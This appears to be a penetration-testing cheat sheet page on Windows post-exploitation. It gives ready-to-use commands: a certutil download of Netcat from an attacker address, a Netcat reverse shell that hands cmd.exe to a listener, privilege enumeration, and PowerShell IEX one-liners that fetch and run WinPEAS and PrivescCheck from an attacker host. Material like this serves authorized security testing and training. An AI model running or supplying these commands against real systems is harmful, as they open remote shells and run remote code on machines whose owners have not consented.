Utils

1. File Transfer using certutil

Transfer a file from a remote server to the target machine:

certutil -urlcache -f http://10.10.31.2/nc.exe nc.exe

  • certutil is a built-in Windows utility that can be used for file transfers.

  • The -urlcache -f flag forces downloading the file from the specified URL.

  • nc.exe (Netcat) is saved to the local machine.

2. Connect to Listener using Netcat

After transferring Netcat, establish a reverse shell:

nc.exe -nv 10.10.0.2 1234 -e cmd.exe

  • -n : No DNS resolution

  • -v : Verbose mode

  • 10.10.0.2 1234 : Attacker’s IP and port

  • -e cmd.exe : Executes a command shell on the target

Note: Ensure a Netcat listener is running on the attack machine:

nc -lvnp 1234

3. Privilege Escalation Check

Run privilege checks to identify potential escalation paths:

whoami /priv

  • Lists available privileges.

  • Look for SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, etc.

Additional enumeration tools:

systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn

  • systeminfo: Gathers OS and patch details.

  • wmic qfe get ...: Lists installed updates.

For automated privilege escalation enumeration:

  • Use WinPEAS:

powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/winpeas.ps1')"

  • Use PrivescCheck:

powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/privesccheck.ps1')"

PreviousIncognitoNextVirtualization

Last updated